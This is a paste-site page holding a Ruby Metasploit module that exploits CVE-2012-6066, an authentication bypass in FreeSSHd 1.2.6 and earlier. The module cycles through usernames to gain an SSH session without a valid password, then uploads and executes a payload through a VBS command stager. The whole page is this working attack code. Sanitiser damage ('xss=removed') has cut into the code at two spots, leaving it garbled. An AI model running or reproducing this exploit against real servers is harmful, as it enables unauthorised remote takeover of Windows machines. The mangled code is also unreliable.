CVE-2012-6066

From Lawrence Amer, 2 Months ago, written in Plain Text, viewed 68 times.
URL https://secploit.com/view/ec5458a6 Embed
Download Paste or View Raw
  1. require 'msf/core'
  2. require 'tempfile'
  3. class Metasploit3 < Msf xss=removed initialize(info={})> "Freesshd Authentication Bypass",
  4.             'Description'    => %q{
  5.                     This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
  6.                 authentication. You just need the username (which defaults to root). The exploit
  7.                 has been tested with both password and public key authentication.
  8.             },
  9.             'License'        => MSF_LICENSE,
  10.             'Author'         =>
  11.                 [
  12.                     'Aris', # Vulnerability discovery and Exploit
  13.                     'kcope', # 2012 Exploit
  14.                     'Daniele Martini <cyrax>' # Metasploit module
  15.                 ],
  16.             'References'     =>
  17.                 [
  18.                     [ 'CVE', '2012-6066' ],
  19.                     [ 'OSVDB', '88006' ],
  20.                     [ 'BID', '56785' ],
  21.                     [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
  22.                     [ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ]
  23.                 ],
  24.             'Platform'       => 'win',
  25.             'Privileged'     => true,
  26.             'DisclosureDate' => "Aug 11 2010",
  27.             'Targets' =>
  28.                 [
  29.                     [ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
  30.                 ],
  31.             'DefaultTarget' => 0
  32.         ))
  33.  
  34.         register_options(
  35.             [
  36.                 OptInt.new('RPORT', [false, 'The target port', 22]),
  37.                 OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator'])
  38.             ], self.class)
  39.     end
  40.  
  41.     def load_netssh
  42.         begin
  43.             require 'net/ssh'
  44.             return true
  45.         rescue LoadError
  46.             return false
  47.         end
  48.     end
  49.  
  50.     def check
  51.         connect
  52.         banner = sock.recv(30)
  53.         disconnect
  54.         if banner =~ /SSH-2.0-WeOnlyDo/
  55.             version=banner.split(" ")[1]
  56.             return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/
  57.             return Exploit::CheckCode::Appears
  58.         end
  59.         return Exploit::CheckCode::Safe
  60.     end
  61.  
  62.  
  63.     def upload_payload(connection)
  64.         exe = generate_payload_exe
  65.         filename = rand_text_alpha(8) + ".exe"
  66.         cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
  67.         opts = {
  68.             :linemax => 1700,
  69.             :decoder => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
  70.         }
  71.  
  72.         cmds = cmdstager.generate(opts)
  73.  
  74.         if (cmds.nil? or cmds.length < 1 xss=removed pass=rand_text_alpha(8) options={ xss=removed> pass,
  75.             :port     => datastore['RPORT'],
  76.             :timeout  => 1,
  77.             :proxies  => datastore['Proxies'],
  78.             :key_data => OpenSSL::PKey::RSA.new(2048).to_pem
  79.         }
  80.         return options
  81.     end
  82.  
  83.     def do_login(username,options)
  84.         print_status("Trying username "+username)
  85.         options[:username]=username
  86.  
  87.         transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
  88.         auth = Net::SSH::Authentication::Session.new(transport, options)
  89.         auth.authenticate("ssh-connection", username, options[:password])
  90.         connection = Net::SSH::Connection::Session.new(transport, options)
  91.         begin
  92.             Timeout.timeout(10) do
  93.                 connection.exec!('cmd.exe /c echo')
  94.             end
  95.         rescue  RuntimeError
  96.             return nil
  97.         rescue  Timeout::Error
  98.             print_status("Timeout")
  99.             return nil
  100.         end
  101.         return connection
  102.     end
  103.  
  104.     def exploit
  105.         #
  106.         # Load net/ssh so we can talk the SSH protocol
  107.         #
  108.         has_netssh = load_netssh
  109.         if not has_netssh
  110.             print_error("You don't have net/ssh installed.  Please run gem install net-ssh")
  111.             return
  112.         end
  113.  
  114.         options=setup_ssh_options
  115.  
  116.         connection = nil
  117.  
  118.         usernames=datastore['USERNAMES'].split(' ')
  119.         usernames.each { |username|
  120.             connection=do_login(username,options)
  121.             break if connection
  122.         }
  123.  
  124.         if connection
  125.             print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)")
  126.             upload_payload(connection)
  127.             handler
  128.         end
  129.     end
  130. end

Reply to "CVE-2012-6066"

Here you can reply to the paste above